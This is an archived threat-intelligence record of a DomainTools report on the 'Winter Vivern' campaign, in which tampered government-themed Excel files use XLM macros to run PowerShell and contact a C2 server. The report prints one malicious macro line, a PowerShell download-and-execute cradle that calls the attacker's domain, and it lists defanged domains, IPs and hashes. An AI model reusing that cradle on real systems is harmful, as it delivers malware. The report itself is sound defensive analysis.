{
	"id": "6409cc18-5af2-4b1f-ba4b-7b3a2a9cfd0c",
	"created_at": "2026-04-06T00:13:09.643208Z",
	"updated_at": "2026-04-10T03:30:21.356656Z",
	"deleted_at": null,
	"sha1_hash": "38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f",
	"title": "Winter Vivern: Re-Crafted Government MalDocs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 450386,
	"plain_text": "Winter Vivern: Re-Crafted Government MalDocs\r\nBy Chad Anderson\r\nArchived: 2026-04-05 14:53:28 UTC\r\nWinter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple\r\nLanguages\r\nExecutive Summary\r\nWhile parsing Microsoft Excel documents using XLM 4.0 macros, the DomainTools Research team came across a\r\nLithuanian-language document title innocuously named “contacts”. The simple macro in this document dropped a slightly\r\nmore complex PowerShell script that performed C2 communications with a domain that has been active since December\r\n2020 and appeared on no industry-standard blocklists. The most recent domain serving documents was registered in April\r\n2021 and DomainTools Research believes other domains used as short term distribution may lead to other documents. The\r\nmacro and domain mentioned, when hunted on, revealed documents targeting Azerbaijan, Cyprus, India, Italy, Lithuania,\r\nUkraine, and the Vatican. The DomainTools Research team colloquially refers to this as “Winter Vivern” due to the path\r\nused in C2 communication over the last several months.\r\nContext For Defenders\r\nXLM 4.0 macros, the precursor to VBA in Microsoft Office documents, continue to be a problem as malware authors\r\nleverage them to avoid detection. Many times, well crafted macros that span multiple cells and use obfuscation can be\r\nused to obscure adversary infrastructure from virus scanners and other tools. While tooling has come a long way in the\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 1 of 6\n\nlast few years that XLM macros have been en vogue, the DomainTools Research team continues to hunt for new and\r\nnovel ways that attackers hide domains in these documents.\r\nWe suggest anyone looking into a document containing XLM macros take a look at the excellent\r\nXLMMacroDeobfuscator tool to assist in parsing. However, do be aware that there is currently a bug that breaks\r\ndeobfuscation when multiple macros are in a single cell. This was the bug the DomainTools Research team was trying to\r\nsolve while hunting for documents that failed in this way. As luck would have it the project maintainer already has a fix in\r\na testing branch if you as a defender come across this problem in documents you are analyzing.\r\nThe Malicious Document\r\nThe initial Lithuanian-language document, titled vtas_kontaktai_2021_04_20.xls, contains the typical request to enable\r\ncontent if the document is not functioning properly. The document says it contains the “Contact Details of Municipal\r\nAdministrations Departments for the Protection of the Rights of the Child”.\r\nThis is a document which the official government of Lithuania provides and can be found on Google as seen below.\r\nHowever, the modified version includes a malicious XLM 4.0 macro that calls out to the domain secure-daddy[.]com.\r\nThis initial piece follows on all subsequent documents mentioned later in this writing as well.\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 2 of 6\n\nCALL(\"kernel32\",\"WinExec\",\"JCJ\",\"powershell -c \"\"iex (New-Object Net.Webclient).DownloadString( 'https://se\r\nWhen executing that string, another PowerShell script is pulled down and run which pulls down one of two scheduled task\r\nfiles depending on the Microsoft Windows version it has infected. These scheduled tasks regularly run the above pull from\r\nsecure-daddy[.]com so that the script can keep itself updated. The script contains a simple push with all system\r\ninformation up to the C2, then checks at regular intervals for new commands, presumably capable of dropping another\r\npayload.\r\nAdditional Targeting\r\nExamining the origin of the document on VirusTotal we can see that the initial document comes from the URL:\r\nhttps://securemanag[.]com/data/public/uploads/2017/08/vtas_kontaktai_2021_04_20.xls\r\nThis URL also servers up the Azerbaijani-language application-for-visas.xls and a generic Peace Institutions contact\r\ndocument in English. All documents contain the PowerShell script mentioned above. When hunting for anything calling\r\nout to the secure-daddy[.]com domain we found the Italian-language Rassegna Documentazioni Dicastero per la\r\nComunicazione.xls (first seen 2021-03-07) and the Cyprus-language document Ενημερωμένος κατάλογος.xls (first seen\r\n2021-04-21) which is another set of contact-themed documents. All documents so far have had an author of “Admin” and\r\ncontained a Cyrillic code page.\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 3 of 6\n\nSince December 2020, secure-daddy[.]com has also been involved in distributing documents from two URLs that would\r\nsuggest earlier targeting of the Indian government and the Vatican:\r\nhttps://secure-daddy[.]com/mail.gov.in/iwc_static/c11n/allDomain/Documents/mealib/List%20of%20online%20datab\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 4 of 6\n\nhttps://secure-daddy[.]com/www.sdsofficium.va/portale/portalesdsext.nsf/\r\nAttacker Infrastructure\r\nExamining the attacker infrastructure, we found that neither domain was on an industry-standard blocklist, but that\r\nDomainTools predictive Risk Scoring algorithms did properly rate them as the highest possible risk for malware.\r\nWhile the initial C2 domain secure-daddy[.]com was registered in December 2020, the serving domain\r\nsecuremanag[.]com has only been active since April 2021. This indicates to us that the adversary is likely starting a new\r\ncampaign, serving documents from this address and hiding their C2 behind infrastructure they’re reusing from before.\r\nBoth domains are hosted on 3NT Solutions LLP, but are split between the older domain in Sweden and the latest in\r\nEstonia.\r\nExamining passive DNS we can see that there has been a decent run of activity on the C2 domain so presumably some of\r\nthese documents have worked and more are out in the wild. Additionally, the SPF record indicates that it accepts mail\r\nfrom a wide range of servers and is set up (per the SPF record with ~all) to send mail in transition.\r\nThe newer, document-serving domain has a similar setup but only contains the hostinger[.]com portion in its SPF record.\r\nHowever, what is more interesting is that the IP address behind this domain was previously hosting centr-security[.]com.\r\nWhen searched for in VirusTotal this reveals another document served up targeting Ukrainian-language speakers from the\r\nURL https://centr-security[.]com/mil.gov.ua/documents/stat/statistics-donbas-07042021.xls.\r\nIt’s important to note that centr-security[.]com has already been placed on a blocklist, but that this domain is spoofing the\r\nCouncil of European National Top-Level Domain Registrars (CENTR).\r\nConclusion\r\nThis campaign has seemed to have run largely undetected since around December 2020 with a wide range of targets and\r\nlanguages. As the scripts are unobfuscated and quite simple, we don’t see this being a complex APT-level campaign as it\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 5 of 6\n\ndoesn’t leverage any known tooling. However, we feel it’s always important to note that sophistication is not a\r\nrequirement to success. Since this cluster of documents can’t be tied to any other campaign, attribution is difficult at this\r\ntime and DomainTools Research is monitoring this as an independent cluster.\r\nIoCs\r\nFile Hashes\r\nFile Name Hash\r\nΕνημερωμένος κατάλογος.xls 94f45ba55420961451afd1b70657375ec64b7697a515a37842478a5009694cfa\r\nΕνημερωμένος κατάλογος_NS.xls 2a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a\r\nvtas_kontaktai_2021_04_20.xls f84044bddbd3e05fac1319c988919492971553bb65dbf7b7988d66a8cd677eb8\r\napplication-for-visa.xls bd1efa4cf3f02cd8723c48deb5f69a432c22f359b93cab4f1d2a9f037a236eaa\r\nDB%20-\r\n%20Peace%20Institutions%20(draft).xls\r\n00f6291012646213a5aab81153490bb121bbf9c64bb62eb4ce582c3af88bccfd\r\nRassegna Documentazioni Dicastero per\r\nla Comunicazione.xls\r\n638bedcc00c1b1b8a25026b34c29cecc76c050aef56fa55f6e8878e6b951e473\r\nserverHttpRequest(RUN).txt c34e98a31246f0903d4742dcf0a9890d5328ba8a1897fcf9cd803e104591ed5f\r\nDomains\r\ncentr-security[.]com\r\nsecure-daddy[.]com\r\nsecuremanage[.]com\r\nIP Addresses\r\n37[.]252[.]9[.]123\r\n37[.]252[.]5[.]133\r\nIris Investigate Hash\r\nU2FsdGVkX1+/QFMAzMGoRJL1g99F/qbks7NwRHYLPXkMcCCMO1whT0jHrV5fHxs8ZVy3Cc2kvVawfePzqppMhHBvCquXS2sz1JKAw2lAbjSl\r\nSource: https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/"
	],
	"report_names": [
		"winter-vivern-a-look-at-re-crafted-government-maldocs"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434389,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.pdf",
		"text": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.txt",
		"img": "https://archive.orkl.eu/38463aa76795c9cc4ac4c0b8c7ea6544ed6e6d6f.jpg"
	}
}